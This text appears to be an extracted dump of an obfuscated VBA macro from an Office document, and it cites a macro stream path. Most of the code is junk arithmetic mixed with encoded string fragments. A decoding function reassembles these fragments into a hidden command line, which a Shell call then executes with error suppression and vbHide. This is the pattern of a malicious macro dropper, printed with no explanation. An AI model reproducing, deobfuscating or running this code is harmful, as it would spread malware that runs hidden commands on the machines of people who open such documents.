Tan(atkGiM / CBool(vBKjrNY / 8738733 / liKEIrwjAzV))))sIfSXw = ppXrNABnE = OSXaR = (6233223 / PtpJrifPckBjv + 695703 * jrVGiS * (4245786 / LlpiWMndrLHRG / 1556770 - Tan(zLrclPA / CBool(JAHmj / 876469 / CYtCdXB))))RfrsBkS = gjHBjhbyuf(kiSMIFS, 7, 89)ztfAB = "XPHOQDSVawRoubXZDAlBQOAMDAjBgYAIGAlBAMAIGAiBAOAYGAwAgZAIDAhBwMAUDAmBQMAcDAjBgMAUGAjBAMAcDAzAAMAYGA1AwNAADAhBQOAUGAwAgMAUDA0AQOAgDAzAANAEGA3AQMAUGAzAwNAkDAhBgZAADA3AQNAQDAhBAZAQDAxAAOAMGAkBAOAgDA4AQNAMDAzlsmLroMBlNjEALQ"iAHUR = MzZqpuPcL = RzMTMEjM = (2948498 / IvqMEmRbo + 2795570 * CwRirCsNX * (4558254 / LirQustnjjmuW / 3129771 - Tan(NlDdon / CBool(zPBvlUCnzrzSkI / 3925004 / rYiAfoQEvRko))))LCdPzmCvi = HJujCOkcP = HYlvjuwEfzszME = (1212778 / QIzwATkNjqzO + 2950304 * XrZrRJPkH * (4171550 / rmlvKz / 7985651 - Tan(PzbdSznoXO / CBool(wioJbBXUnwXjB / 5670734 / JhzSWsIlzXvO))))SwiARdQw = gjHBjhbyuf(ztfAB, 16, 187)wiwTiIKb = "rQLAjworKOaEuLJDBlfRJupmBQNAMDAzAgYAEDAhBQMAgDA5AAOAYGAyAAOAIDA1AANAEDA5AwNAIDA3AwMAIGAyAwYAUDA1AAOAMDA1AgYAEGA1AgMAMGAhBAF"wJdDAWpji = sifKYmaku = hSVptPMPNPMAt = (86951 / TSSXiETkAii + 2103482 * jjZIKVYW * (5021972 / plmSvSWsp / 5916415 - Tan(EUINMnNiUG / CBool(EtfdqDp / 4543289 / JtucmvmXRd))))HiBmPsNsFSR = qojnfPRvw = KnFQajsmScS = (464507 / CVLZfaQA + 8091169 * rPaYFAOY * (1678008 / pRVniCGCzFpKo / 4447404 - Tan(STplUhhUXO / CBool(zImmD / 708667 / KclAXv))))vLVBC = gjHBjhbyuf(wiwTiIKb, 2, 99)jAwHiJ = "tTGmUAUDA0AwYAgDAjBQZAUDA0AwYAQDAyAgYAYLDvzWzjoLJijDzAaJ"DzWuUDp = HBcoKdVzm = KsbAGPUmjhJ = (3830248 / UizFm + 433846 * JTkKtpbRZolYiu * (3666633 / bPqNNqqKsnz / 1449643 - Tan(LXizrZ / CBool(IRHQnDNrvllHB / 91629 / qvpiTdaRF))))AFcbalcb = qTLNQDaqV = ZKIZZKcwOH = (368022 / GFnjmIJGMiABa + 3930320 * zasKvlYaNiVPX * (8142667 / LJEzNGakQR / 6447275 - Tan(QrKHzETc / CBool(WwGFhiawQ / 8632495 / PhWqwaGlZqbs))))mjlsnFbCmkS = gjHBjhbyuf(jAwHiJ, 18, 34)SibCQkmLV = "CbmTiPBYSXLNMhSAUGAyAQOAkDAjBAOAEDAjBQMAADA2AwNAEGAzAAOAYDAjBAOAUGA4AAOAYDAhBANAEDAiBgNAYDA3AAOAgDAjBQMAIGA0AQZtWGWvmOIkRQvzHFsN"ZnFBzzmbGw = VLrwmSwXU = zrWcDYPbrG = (1188805 / zhzdacwGznHIW + 495471 * KBYOTC * (9190483 / jvGXolFwAq / 5979815 - Tan(KzJsTaO / CBool(KkOGBSEaTr / 7390945 / BCPhTEIVuqGR))))tzarus = qovLrfuto = UzjzWVjf = (5620775 / ErMHjb + 4888447 * SsiTdzP * (2448998 / tioztwiiQ / 242795 - Tan(hmoPNwMw / CBool(ocQFfbvkBW / 6790189 / KwnwpLLtdZT))))IoFUk = gjHBjhbyuf(SibCQkmLV, 18, 96)QECmVWbIf = "wOkEOP4AQMAYDAmBAOAYGAwAAMAADA4AQOAMDA0AwYBsVatZuqWMWDOiDfldJpwTPKA"DbHnhczQVwY = OSWjidmFp = OzPHmwPD = (4795397 / XjzHXoFLS + 4475525 * PzazUzX * (8592956 / iQVRW / 595588 - Tan(JMcPj / CBool(WlhVPMtYanSDz / 259896 / JSzsLUpGLflT))))kGohXHRJL = lwzqHdWbo = whKzjHd = (590013 / XBNzucX + 4736637 * jfWqisHbb * (9448340 / acZAuTR / 6522318 - Tan(oicIROS / CBool(wENkEwvJs / 1514573 / RrEjj))))NTiqD = gjHBjhbyuf(QECmVWbIf, 26, 36)AVnCDHMVO = "EzMZWQjGAScvn4AAOAUDA4AQOAQGAzAQYAMDAjBgYAMDAjBgYAMDAzAgYAMDAiBQOAUDAiBAOAUGAzAgYAMDAkBgMAcDA4AQZAgDA1AgNAkDAmBAMAQDA5AwMAYGA5AgMAIGA2AQNAcDAxAwNAYDAxAgYAUDAmBgNAUDAzAgYAQGAyAgZAUGA1AQMAEDA1AANAcDAMYNqwECzAa"siIVL = JsAzLDsnn = CVAOABio = (8435210 / imRNmn + 202882 * njlZwiqD * (1118093 / jsslz / 5448761 - Tan(JdAjhsohUfX / CBool(mKXCbAHddW / 4161762 / zvcFzMwmp))))WolGuhTM = hcKAkGnzs = zScTrLqRlr = (9688975 / mIcjl + 3067482 * iHiklFhNBqt * (3891545 / lsWFUcluIvL / 9003908 - Tan(iqBYBVXNJXQiq / CBool(JzoarXR / 3324030 / lWOIipZLWpuar))))ENCqSR = gjHBjhbyuf(AVnCDHMVO, 11, 184)GTENXCcc = "RUzwii1AgZAMDA1AwYAQGAlBANAUDAhBgNAQDAiBQZAUGAxAQZAgDAyAwYAMGAkBQYAUDAxAAOAUDAjBgYAcDA2AgNAEDAhBwNIbfqqTuiqiTZkUpjzSRYwXsZmnii"DqzuzpTwhT = bVoijIXDw = UTCTqjv = (1511246 / WupZM + 4908817 * sMPLqTFIzpXaAs * (4785539 / ZIPiAzAzj / 2309175 - Tan(CflvcJjQKnmXB / CBool(tTAIUHI / 9568146 / PQwqwsLPc))))qiTjsoNU = icDcNtuRQ = NjmkNUHjzq = (2852053 / iFIWf + 6060660 * lXzYKtZL * (3241616 / GNDrjj / 7522290 - Tan(jjWrLMYNat / CBool(UrOPzfEOLbqoJq / 5097775 / dLNCVVszwvtMn))))bFRhQlCinR = gjHBjhbyuf(GTENXCcc, 29, 92)tiSaMPR = "JvtAaZiHkZAYGAzAQMAEGA5AANAIDAyAwYAYDA3AwMAcDAiz"fcHDsLlNh = RUsRIHiQV = zzYzGbr = (1427673 / TsQRlBBnAv + 4502245 * rGWOjh * (3380725 / IoBPFKbuQojZ / 4019512 - Tan(pNADHQGTiU / CBool(DFqBlZtZWVirAM / 5173496 / HXLLwnPRI))))cTajGWECQz = NdZBioGjS = EksiO = (8041873 / wGKWzqjqzwWJzQ + 8216578 * sXwUYshYK * (6708161 / WpOszWw / 7842916 - Tan(GmOmsL / CBool(rjXSkNKzGR / 4114778 / GYmLQfKAkE))))hcFiOBTTdt = gjHBjhbyuf(tiSaMPR, 2, 38)hwluzEpOjd = "EkoYKjnrXuloRGXiwIsiubTPEGAjBwMAUDA1AgR"OOqtlArrA = wpPisNmEA = ZdUUBlY = (6897375 / jVfSDuccNzMOtl + 2397467 * JCuuIB * (3671566 / zQYCiw / 3364108 - Tan(DZmvTW / CBool(oPkZFnw / 6176904 / HOsjiprfCYTnV))))TQcVwiOuIXj = auQhELTzQ = mqFiXbNTDkju = (3895488 / iiOiH + 8694051 * DZSpqIYjlMsqbF * (8624497 / LTDpFPCof / 4988986 - Tan(zZwlsXr / CBool(RnohSpjSXoE / 8534857 / pFDPEEpnWdKQzY))))EOGbI = gjHBjhbyuf(hwluzEpOjd, 2, 13)fcCMwP = "tTfUXTVvCAIDzQAnnzzVhVtOQXEDAyAQYAQGA0AwYAUDA5AQNAYGAjBQZAMGAhBAZAADAhBQMAUGAzAgNAEGA3AQYAcDA3AgNAUDAyAwYAYDAzAAMAjjfMqYcY"asGTnFtbSn = jisblaAjt = HEVYVJRtJASq = (6489256 / rkAWdvz + 7607478 * jMlokEwjPG * (4705547 / PtJjuOBYjktB / 6618705 - Tan(AadDzrTaoLk / CBool(joKQCkJY / 5386390 / qnjhvPuwSkGBE))))nuiUCtNANX = YGMIhSpEz = ZiMNThIrKHJkqT = (2988242 / EfstAOikmKqbcF + 7386492 * soJziBbOKswt * (8932222 / QstlOJMEwLDc / 5286680 - Tan(rhPEVX / CBool(BJPMCEdjIRlqz / 8888893 / iqrcZnpwwGaSXc))))DqtizzSQ = gjHBjhbyuf(fcCMwP, 9, 88)MwpRau = "DliSPRblAMAIDA3AAZAEDA4AQZAQGAlBANAEDA0AwMAIDinpJCoGznGOiDZR"zkMFiO = UImMFomjh = cdzfvIcruz = (9264524 / MCpmY + 131345 * VzjvvLPG * (8208207 / VfDlAnjV / 4986888 - Tan(VGozImPwk / CBool(SPmNMfsiC / 3810981 / ClZZUsTLPIR))))dnEqwnkiR = wczPIkmJw = VTwFtqZU = (8975499 / TGsTUPaotvlVOB + 3278623 * PzWIvt * (4480503 / jSaTaCu / 8267082 - Tan(KwskiutK / CBool(PAhAFzojaczmDa / 6695411 / nCoGNqAuAE))))tCsBVhJ = gjHBjhbyuf(MwpRau, 17, 36)cVdXsUz = "RBwSlwoYvSEGAmBQNAIDA2AQNAIDAiBQMAYGAyAQZAADAzAwMAYGA2AgNAEGAxAQYAgDAmBgMAADA5AgNAIDA4AwYAMGA3AAMAQDA3AQOAUDA0AAZAMDAmBQOAkDAlBQOAADAlBwNAgDAxAAZAkDAxAAMAkDAHjktqTDrjZhmTIBMfjzuW"Qrbfv = GcdcLqbpd = zDQOJIiRv = (8427911 / GzIUN + 8068639 * ibAEhHzHYRSY * (6938037 / JIGLlboGSc / 96531 - Tan(kzfVI / CBool(AmKBXsWIPBjNzW / 1489881 / zoBJcOBXIY))))TMlTIHdvQw = DjXzbCIUY = RHlNocMmWFcdtH = (468230 / TzUmlmtzpplQZ + 6296362 * iwKKq * (684806 / UACPADvZmPwl / 6747771 - Tan(zmMfNl / CBool(zrvMqAwfj / 9480041 / nffUjWl))))zSzuzDU = gjHBjhbyuf(cVdXsUz, 22, 147)wVMcMwrlh = "zrdWFRfSDAyAgYAMGArpbfZiaXwcarj"NIKTjSHt = YWRkbowRt = woUJdfdlJlX = (9950702 / JpcsiDhNHwik + 7169831 * UIScWkwU * (1746446 / SnVXrd / 6657659 - Tan(ZiIuzvNOMTqspY / CBool(KJcqJAPpojSav / 6539429 / VdNhLC))))attZkiRsN = MaIWOIXfd = TuvKOPmZ = (9266203 / tTOjVS + 6179544 * zNiHM * (8091385 / iUUvsrJLPwjzXv / 1241351 - Tan(olCIsMbBvcVhP / CBool(MhFMfuSiDRkI / 9717893 / pSJHrWpVKhG))))sEWFsm = gjHBjhbyuf(wVMcMwrlh, 14, 10)BmouLJ = "uLEQKdIjNkLHAAMAcDAiBgMAIDAyAAZAMGAjBQMAkDA2AAOAQGA5AgYAYGA2AgMAMGA3AgZAUGAwAQMAcDAmBAOAADA1AwNAEDAzAACo"aVYDqVdYVp = qmVJozPAt = WaztkszQAkQb = (7502718 / HPtcITFEiX + 606912 * uODwF * (922609 / knURIOVmjD / 1812791 - Tan(PztCZGnrafSwc / CBool(jzjMBiLAConzk / 2780777 / hWAUfnEAMirS))))wvkFWVX = NAEVXpShY = WBifO = (9308355 / ObWYEs + 1823346 * bzCcwXiJ * (2345296 / zwTPHRhOizwpzZ / 1465432 - Tan(zCVtIIuDwsPEbf / CBool(rShOwlzUErpO / 1916631 / lwcVBZjo))))mwDBYaGKijX = gjHBjhbyuf(BmouLJ, 4, 89)ZaziqiqT = "FRBQYAYGA1AANAEDA3AQOAYGA1AAZAUGAiBANAkDA1AQYAQDAiBQmCpPnGaLbzffD"FfwJVjOOj = XimWoXvHq = cwDJTH = (5876685 / UjELIu + 4026954 * OsWoHQmwuv * (5563475 / bFqSGHsb / 6030345 - Tan(qZENDwnMa / CBool(BKJClCwMJHPYi / 2815883 / PplFABtztC))))lZwsP = wjtMqIhUk = RwojDJf = (3353795 / FRvpioHBH + 5014049 * HKPApSEATwhEt * (44724 / SAEBrWc / 5227828 - Tan(kAuLYjGautGH / CBool(orlEfzZYNBp / 4178659 / GwFiUfjcP))))jBITvPRb = gjHBjhbyuf(ZaziqiqT, 15, 49)dMwQmWRF = "OpZRzTIwXBEXbtqu2AQYAIGAiBAOAYGAmBgMAQGA3AwMAADA2AQMAUGAyAQNAQGA5AgMAMDA1AwYAIGA4AgMAEDAxGFirRXKbPJPW"vkFjajuJ = MtHdGwfFb = iCHYlUplNP = (4485263 / LiIYIFiiusqFw + 1894488 * KKVSOVfr * (2885473 / BuvGncbKTi / 5682261 - Tan(hqZWwiqMC / CBool(bAiarwIXfm / 8697879 / GLnXGPOuibqpcf))))ZvXDRw = trZzBCZaS = bNkfBvDqbjjNj = (4752189 / awHwAKpzMD + 3221286 * hlqYfttvtfjsiY * (9918476 / tvfIAUa / 869640 - Tan(iRkmPXbl / CBool(VFlLDTqcjvPONc / 2042763 / ERXIwMKmFB))))OiTHLRtF = gjHBjhbyuf(dMwQmWRF, 13, 73)BCUJAm = "NrCfQRDAiBQZAMGAxAwMAYGAiBAOAMGAhBAMAMDAxAANAQGAkBgYAEDA4AgNAkDA4AgYAUGAmBwNAIDA1AgYAIDA2AAMAIGAiBQYAIGAyAQYAIDAlBQMAIDAiBwNAYDAxAAZAQGAmBQMAADwFfOwZp"EwdLQXuJ = iPCDSEwVm = FcqhQVwkrFWu = (7675889 / GvXZljT + 2029893 * NLkbXWPmitDcU * (9677918 / sqqwAhCnbnz / 4495391 - Tan(YjFUukdVjuY / CBool(cTnBkmm / 9405166 / hvqXKKKXInazi))))wKRQStS = NzojhjVML = RhXNOmrALaqroO = (9393247 / ZSwXGwPuGoMA + 908525 * bdVwZ * (7937956 / zwlRnPYrWLZm / 9507632 - Tan(COnqSSd / CBool(aZqvIw / 2503787 / qpHwbWMGS))))dKjAzVGtGi = gjHBjhbyuf(BCUJAm, 8, 137)GjCnl = "UswpBHATNAMGA4AgZAMGA0AAMAMGAyAQMAIGAxAwNAUGA5AQNAUDA3AwNAEGA3AgYAYDAzAAMAQDA3AgNAgDA4AgYAEGAiBQOAIGA1AgMAMDA0AQZAUDAwAQMAkDAyAAZAYDA2AwNAIGAmBgNAUDNtEDdJFBaH"NBjShSfji = IzfCBzGLC = qktjHjjoAMqJ = (3648736 / ajYnQqWVAp + 9896722 * NLwlPji * (5789798 / pFWhTwYlpDz / 5797376 - Tan(cVYTu / CBool(RUjDjvT / 4451568 / OwHiowkaBGwsw))))jiaSXWjj = jLlzhLjdM = oSMMGBplAbiXtw = (4034254 / EruXNwTTkXSh + 2651723 * nMBzSM * (5473742 / iZMUvRPMSpi / 8589795 - Tan(sjpjqz / CBool(bijIXtnWWtdIM / 3976488 / VLsCBDY))))ELUPRwpH = gjHBjhbyuf(GjCnl, 13, 138)MQwQtbMf = "VkkzZDBzfBgYAYGA3AAZAUGAzAgYAEGA1AAMAEGAlBAZAYDA2AQZAYGAxAwYAIDA1AQQjwI"bNilwoiVDm = dddEMhjIz = KCrmJBlHGmnAjJ = (5687680 / oNhWv + 4513761 * dHXCqzsSRQm * (2412464 / vnWULjTardwTb / 1960099 - Tan(VabAmVOflzuJN / CBool(WjtzkGAr / 2540224 / PDFldaj))))kziFYij = PnzwrpmZX = IkVRWFGVtCW = (8243086 / tiNRl + 6723501 * dBLQfWOX * (5880200 / HXMZrGrtswzPj / 4588403 - Tan(YkGRiXB / CBool(HDGZFmArirzvw / 5796772 / BYVYskQNSn))))tHCnwzQRo = gjHBjhbyuf(MQwQtbMf, 5, 58)jCKFAUiVMR = "BIjQAwMAkDAzAAMAADAxAQOAYDA3AwNAcDAmBgMAMGA3AgZAMGAlBgMAkDA2AQOAkDAxAwNAMbujwRavfozurzPwhMJwcAfSX"vAILpTSwmr = bOThjPAGs = LdSwApUIKHaX = (8229662 / jOMRnmAVdqSVI + 9349375 * ZhAvIJTWCZtp * (3625829 / ujEXbwSCiTF / 7934744 - Tan(AbjijYSkZZbih / CBool(sJstzhni / 2077004 / wjzWWwh))))wpwjvLivEBc = pSTSuWuNQ = wUGcouiatqZHHC = (3457626 / SjzawOas + 7318956 * Ozznzjhh * (8182478 / EkJmPvd / 1672321 - Tan(iLQAdD / CBool(NqDitOq / 4739638 / lcFstaaMEMh))))CtiGajmkTh = gjHBjhbyuf(jCKFAUiVMR, 25, 69)AlDOvWUmiR = "azCBwjIEEOHOWojYKoWzqoMZPuzAxAQNAADA2AwMAEDAmBwYAIDAlBAMAEDAhBQNAYGAiBgZAUDAwAwNAQDAzAAOAYGA1AQYAUDAiBgYAEDAxAgMAYDA3AAMAQGAxAwMAQDA2AQYAgDAmBAZAgDAiBgMAUDAhBQYAIDAmBQOAYDAhBANAYGA1AwMAIDA3AwYAYDA0AQNAMDAwAAZAITjIM"VZwvK = uhDtzVkaI = zooEGNIYVtsKj = (4119790 / sWKtiXftnKj + 8217428 * NEaSDQRjA * (1313004 / vizSGUjBiKEzaj / 5032257 - Tan(TuAuZWjK / CBool(TaGQDzsP / 2616757 / DYNnTafIOJFzld))))SnDmXhOB = zzozMWYvp = mudki = (2157494 / jMiXuGH + 6438469 * tOVBLToc * (3711969 / KtCqZH / 6802329 - Tan(AZwviDz / CBool(mCGCqhRsc / 1925914 / nqSFBRXASj))))sroVjvuU = gjHBjhbyuf(AlDOvWUmiR, 5, 183)RMswC = "IbOjoCdPQppNYqAQYAMGAkBQNAYGAwAgZAEGA2AQOAMGAmBQZAADAhBQOAEDAhBgMAkVMfXVrhLwQDnCKCDjzDKRFjNj"uiownVww = PdzfmRIAK = TBUtIwsJAU = (5006048 / bnUZi + 4583299 * HDIco * (2397193 / fkniHsTzABzvb / 8715019 - Tan(CSbaOBJKMjk / CBool(CYLYjjRQIWRNhh / 5816307 / TcnwJaBpBNwq))))wpPfLTHF = VZazWuQZp = ROKcYjAOsj = (4495916 / rkwoncWVX + 3573701 * avivSqmQFzq * (2158455 / mhBVomURS / 9781155 - Tan(pCiHoCTFwfj / CBool(qkiYFPSZBZX / 345958 / aBhkzR))))thcTX = gjHBjhbyuf(RMswC, 26, 53)wqhQViSJ = "sHUBkBkXbAjBgMAIGA2AANAYDAzAgGJnIEJJb"KzHWs = zUOYqhquX = FzABXsv = (2455034 / ZtAVtBllslSU + 5835767 * tiHAwOGG * (8848455 / ZYRDwKBCVaYYw / 9782912 - Tan(WFwzJFsah / CBool(WQswwf / 3500533 / JwVjhnhjPwEtVj))))DtRjUX = IiZJKIkmh = kwbuJDXuGYoCAm = (4503778 / QaptWn + 7065044 * INYoUJPXPXzlL * (7502320 / MaJnzsFin / 7303136 - Tan(sJzna / CBool(LlmwfiazIRncnm / 9564672 / BdSNAmzCil))))rsBQPlVCXMj = gjHBjhbyuf(wqhQViSJ, 9, 20)RVbMJiE = "jXMlGYOthwiWONvfwVzBROGAwAgYAQGA4AwNAQGAxAAZAEGAxAgMAEDAlBQOAYDA4AwYAcDA0AwYAIDA5AwYAADAmBwYAUDA5AgMAgDA2AQYAUDAZTH"hwjKrYhCD = vcMmMKKOD = LniIV = (3028706 / OMiLBWZUQfd + 6657498 * dfzzanbsaZN * (6128948 / iPdVZnNJQuD / 8936443 - Tan(FmSvfjjUYfqii / CBool(oqomUfVoJqv / 1046191 / VZNltFjioaiuj))))lpiziV = zKJjnqrGY = bHjOYRcb = (9966495 / qKuLuwZBw + 31021 * KrnfLiZD * (950466 / jwGldKq / 1392051 - Tan(LwiUqoPw / CBool(qRpIYCRQviNmC / 4646702 / MHOoaQliujoRfW))))BkIuzmR = gjHBjhbyuf(RVbMJiE, 4, 89)PZTMtTiEjOw = "FCzzvYAgMAADA2AgMAADAxAgNAUDAlBAOAEDA4AQMAQGAwAwMAADAiBQZAkDAzAAOAIDA1AwNAkDA0AwYAMDAzAQMAEGAiBQNAgDA3AgZAIGAhBwMAYGA1AgNAIGA5AQOAUDAxAAZAQDAiBQZIpUJ"ZpCTv = ijazzHEDL = DSWjFKacobT = (8920427 / hbppYvi + 5116563 * XtohpbbjKYI * (4203311 / ZwmiwTwPSWk / 4440421 - Tan(XHRjIdFUucuXV / CBool(BFRumqCCtDtzOi / 3628146 / XEKwE))))YGmwPTFjKr = TSiQiQKiT = GcUvKBbwjqVNN = (7380399 / ObCqFqM + 4762174 * hnmiHasXaMnUui * (1655786 / wGiGj / 1123066 - Tan(sEQoI / CBool(NBtEZNWPwqGw / 9537759 / BzrUstnJjiSL))))KrXYahuCMw = gjHBjhbyuf(PZTMtTiEjOw, 5, 139)EUAmz = "GuzVuhrkpLwmGAmBgZAUGA3AAOAEDA0AgYAIGAkBAOAIDA1AgZAcDAzAQYAIGA1AgYAQEsZVQlNFPBQnHzPYJnf"qzvjsEZau = dPEtWsMmm = XHBuwAancISKDc = (8760490 / QwXzuoJjfEG + 3356051 * QSOaB * (3746836 / jOwiDSH / 7998493 - Tan(TMbzp / CBool(PPpAjzUPst / 1796042 / MpDjCJfBCAp))))UtmYpo = tcjUjMsfR = nDzkAjQ = (2155959 / EouiuAwjKSUnZP + 4873635 * YCcoCzOrVYmDwB * (4863226 / qDvBztm / 3854513 - Tan(ciNzaOnapch / CBool(WwEaCNWOtkIs / 1041978 / VTYwfQIFZRAuuJ))))jDbNM = gjHBjhbyuf(EUAmz, 20, 56)puriTCO = "tZpDEtoBFBAZKrTjCLQmwMznvOjFMkDAlO"hkJoJsqi = zRcBovsGC = koKGajbcYwLmvM = (7938121 / ANoRlnVX + 5886290 * SBwIIh * (2019645 / FlHksd / 4628793 - Tan(SIhLW / CBool(MYufRkJz / 3673094 / bSQajPndbmGE))))XmNzuuAOriB = JQUKtjVMp = mCoXOcQZ = (9929404 / SUIaMz + 4213066 * VEjkJ * (1573005 / dLGrabG / 9447715 - Tan(fOlIBK / CBool(BmzloHt / 9610934 / NSrkjCsjIkRJiZ))))nYBGc = gjHBjhbyuf(puriTCO, 2, 3)CcDCtEVr = "EwOdcTFYXBQMAMGAiBAZAPwF"FZRJPcZ = wJPSJMMrh = XYpuTDsC = (6121649 / scGfhXanhQEnUl + 2754288 * ziraAhQsD * (8545425 / OthYlikCTDkk / 7296330 - Tan(YJROkEEfvFKK / CBool(zLMNb / 7941800 / MtArTEjiuTN))))dIBnvGwZJj = zFpcXwdTn = iwbObdlrHpI = (9063322 / YfIZv + 6074509 * VkbrMFPW * (7643186 / kIBBivY / 5675702 - Tan(awrndFCEQwOZi / CBool(TNzWkBVNODtF / 9945293 / AujkwDEWizwlJ))))iCbIT = gjHBjhbyuf(CcDCtEVr, 4, 12)uswKJtj = "vZUMElAJjrOQQYAMGA0AAvfSbvt"ZTZPrMUZ = kjtqhOFFD = TILCXt = (5038482 / kDWtdMT + 4782960 * ljWliubYSwTKis * (2577506 / SSTYrKAAtuFk / 8254052 - Tan(hXITT / CBool(jUpOkdFvG / 393707 / KJFKt))))PuUoPlvjIZB = AADbjWrjp = hPQwCPYoGwdFn = (2662687 / Eursu + 5143772 * snXHPsrKcFYs * (9173304 / iKznmUwMPvMpW / 5426258 - Tan(zruQwXcYuz / CBool(zwVYjvSOZjr / 970426 / GmfYcv))))MjvmhNHtCDo = gjHBjhbyuf(uswKJtj, 7, 9)SHzYRwH = VziGLuPjjz + WPicOibzSB + dQIcNsh + ChrW(34) + FnFXCqrORXHC + jIBTlSFkaIz + KJZTfP + EOGbI + tCsBVhJ + wfulZS + jwhPS + ELUPRwpH + MjvmhNHtCDo + kJQbk + fHkdZ + KrXYahuCMw + dzlRupHv + jKofwjNlE + TiwGaYD + NbiHqL + nnwzJzqUUu + UulGq + IoFUk + NTiqD + InXrLQbYI + iRGUUsNY + jBITvPRb + nuujzXVPTqz + MsJPddN + zSzuzDU + UHHIQHPzS + BzPak + qccNtmb + iwqmwDfj + ntJcDiWtZXO + bFRhQlCinR + ENCqSR + JDFSWTdkrtS + DqtizzSQ + iCbIT + hcFiOBTTdt + rsBQPlVCXMj + RfrsBkS + CtiGajmkTh + wpKOVjXV + sEWFsm + jDbNM + mjlsnFbCmkS + dnviYZlaFD + vqzkvC + tHCnwzQRo + WvCDvIYJ + OiTHLRtF + dpJGfAk + vLVBC + ddWLaoYwjX + nYBGc + sroVjvuU + dKjAzVGtGi + thcTX + TiZukVvz + BkIuzmR + vFvvcfdFmQ + mwDBYaGKijX + SwiARdQw + MUFwAhiiSa + UZpOKtovWMh + uOHTIsHmlKJrEv = zZKhNsKBT = wXzmRCjk = (8006843 / NdCOMqVbsRp + 5250998 * qGOvppzhMwELiu * (4088624 / ibZBYhVXv / 3990275 - Tan(XiJBdUaHf / CBool(Htusz / 200716 / zChwzGKqQZY))))IlrAUSZwD = wbqEnpRbh = JZjpZtmaXb = (9771522 / NvCzuMG + 4812385 * SAzjWLdIKo * (6707485 / lPzbvR / 1349416 - Tan(rCWEkOvCnuF / CBool(ICrYjGDh / 1754793 / MnPCbfCX))))zuzrkQdsw = IQbUQiOAj = asoOZYZpj = (7867689 / mQzQuLURRau + 8255917 * vRhwwE * (310301 / sGbfK / 6181173 - Tan(SKbtDQVzbE / CBool(XtiRwjBjT / 1570581 / dsfnftKYkkfuz))))End FunctionSub vMYGVKwdlvt(zaJhGts) On Error Resume Next Dim TkjfsfpJNznzoI() ReDim WBEHh(2) zpMThjdFuwnV(0) = 5181492 LfsNpUo(1) = 3117462 HwarVmjBlKNV = Loo - 9032215 MKwMESwA = 5351248 * 2669506End SubSub zFGYQzFpKYzFO(vVAIwfRYGflYzr As String)On Error Resume NextvtrJqSMzh = BEXHsITOw = KNrQL = (6253044 / tIjzp + 1426210 * MvcvWKTz * (2997182 / tQoCDElDCwRz / 824473 - Tan(fcnYENjLzD / CBool(wjXrmhMwDWvrAp / 902819 / unIDMrwPuWutBD))))iSlHHYNLP = QEBAHkkni = PpYozjFhIzPmTw = (9905422 / cGsijkiXrzKq + 8330176 * JjLulOKilY * (385160 / FOAilEBTIiuzS / 6095894 - Tan(AwAYOq / CBool(ofaYKldzUU / 6322256 / fUXNNFpXVipLb))))GGKhlAnAa = ZVDMuQqKK = TcAndjmSY = (3541080 / JqPzEi + 3681961 * jUtpEuCK * (318983 / ZhLUPsz / 1057977 - Tan(jwwhOiSQ / CBool(nPplXuaFZm / 9342424 / bYlGzlwoaWzzK))))mRlmiHliX = WmWnKQuKS = IaFaNaP = (9416436 / bERRqakcp + 3562569 * fLOEBwkLajuPDl * (8115551 / jrXMOKPCSEV / 6070200 - Tan(ZoErWjz / CBool(BYOpEWp / 6342197 / OfAqElRGhUvL))))lwdFwBrpY = jFsXfTJWK = ZVdqpfWVDnlp = (2329021 / BPbkk + 1090968 * zrQiaHTY * (3422536 / jXjWpH / 1183717 - Tan(acjoCmqsqWPr / CBool(mEUbiNIPX / 536495 / liBSjfLIVwKdnJ))))Shell drhQzJajzSLu + vVAIwfRYGflYzr + uzYCZjD + kYMLKHWbc
vbHidebjSqjRhGF = nLvEAUlAN = YHDEFQtTU = (1116744 / BEIVrfbUKjqv + 3814421 * scjYsZJtwDUXcN * (4819884 / wNATlGniIoJjD / 8390350 - Tan(MkHNoMubjcI / CBool(EBTDOv / 3967117 / duAKlpzPDPd))))qGWInUAkd = DlUqdAihp = vkiJDRjzbzOf = (4630613 / zSzisjjO + 2135319 * isZKjkGQZSTsH * (9408906 / qEWYlOXN / 849595 - Tan(LBzoIChZriLrY / CBool(rswGFwGK / 496914 / CcMpZcHi))))VTVjHbQQm = TQSGzfGht = RHHjAwjm = (6291771 / szOXjVFuIlXpp + 2010762 * tkJCzGIjMqXN * (6903400 / kXokatTB / 8999082 - Tan(dZLYIscSz / CBool(GOakjjjTChJIVa / 4587910 / iFOQUsp))))jYXvjYUOE = QnNVzEArK = zNQVE = (7133455 / uJXDj + 5278472 * YqLMnzu * (6478412 / ErhMBPdE / 4500149 - Tan(UtcTDS / CBool(idLrBj / 2400011 / zGtoDKFRuLdXYz))))ifSfaHVwX = HtdRQWbCI = NEIkQTvOb = (6427417 / Zvljzf + 4715461 * IFiAjmuas * (7951343 / SIUCLuWvCMfstP / 3007130 - Tan(wriRqDjAPiE / CBool(wVtCZjOzF / 8730911 / odkWJdMkl))))UEwiKXDPb = UmcqwwjTc = MAQcESto = (1250535 / XWCzTFuZKsB + 5572428 * XkGwwjnqqAtYkD * (5309459 / QRjziEzjfWrCG / 1719648 - Tan(SjAtszVuHSr / CBool(WJZiBSitaRf / 3384450 / nXRbokjh))))QapjKjtvW = biqXbZFop = YPJADjaFaDST = (6589268 / zFjjwr + 6705318 * wDpBavLzMnwA * (2133713 / GZlAkiTs / 851838 - Tan(wjXVqV / CBool(wBjRGLCIitcrf / 3902545 / whwJwwHEVFz))))hErXpHqzA = wbBAOirFl = BZoOmqWjXrqzO = (2137383 / iwRGDV + 136714 * TjVjwvPGBTf * (909939 / sqEhTaTFJ / 268650 - Tan(qtkkazh / CBool(AsUiRKYl / 1415723 / piiGhlHMZkuh))))End SubSub JhIqEKffCl(EhYLmWu) On Error Resume Next Dim LUUXijMzdNZw() ReDim SQKwJUTac(2) msXCzM(0) = 9176141 CpFVHpKdG(1) = 8432034 CRdollR = Loo - 2615999 dCaOjNh = 5980922 * 1290948End Sub", File "NmhnWHTzJVmj.bas" (Streampath: "Macros/VBA/NmhnWHTzJVmj") has code: "Function VziGLuPjjz()On Error Resume NextWfHIujbNMNc = "rFqiaDipZdAETj dmcGCdQvrwoIHmOPvfYujKqSfVh"qTThwY = QiOzpJzpA = qJWNdudLHM = (3335414 / WFFuTQDdaLM + 5848253 * jGtGqXOJ * (6500279 / sNUhnZSnfHjI / 1789407 - Tan(vqjlXBizrvwnk / CBool(RoDXoS / 2477158 / wjQDHYjXhYz))))DBwcKhIOsSJ = zLzqcljIv = YkzoNWqDM = (3747543 / 